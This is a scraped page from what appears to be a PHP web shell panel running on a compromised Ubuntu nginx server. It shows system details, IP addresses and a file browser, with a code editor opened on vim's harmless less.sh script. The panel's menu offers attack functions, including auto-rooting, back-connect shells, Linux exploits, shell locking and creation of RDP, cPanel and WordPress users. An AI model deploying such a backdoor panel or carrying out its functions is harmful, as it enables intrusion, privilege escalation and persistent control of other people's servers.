Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
vim /
vim82 /
macros /
[ HOME SHELL ]
Name
Size
Permission
Action
hanoi
[ DIR ]
drwxr-xr-x
life
[ DIR ]
drwxr-xr-x
maze
[ DIR ]
drwxr-xr-x
urm
[ DIR ]
drwxr-xr-x
editexisting.vim
124
B
-rw-r--r--
justify.vim
109
B
-rw-r--r--
less.bat
288
B
-rw-r--r--
less.sh
588
B
-rwxr-xr-x
less.vim
5.61
KB
-rw-r--r--
matchit.vim
124
B
-rw-r--r--
shellmenu.vim
115
B
-rw-r--r--
swapmous.vim
114
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : less.sh
#!/bin/sh # Shell script to start Vim with less.vim. # Read stdin if no arguments were given and stdin was redirected. if test -t 1; then if test $# = 0; then if test -t 0; then echo "Missing filename" 1>&2 exit fi vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' - else vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' "$@" fi else # Output is not a terminal, cat arguments or stdin if test $# = 0; then if test -t 0; then echo "Missing filename" 1>&2 exit fi cat else cat "$@" fi fi
Close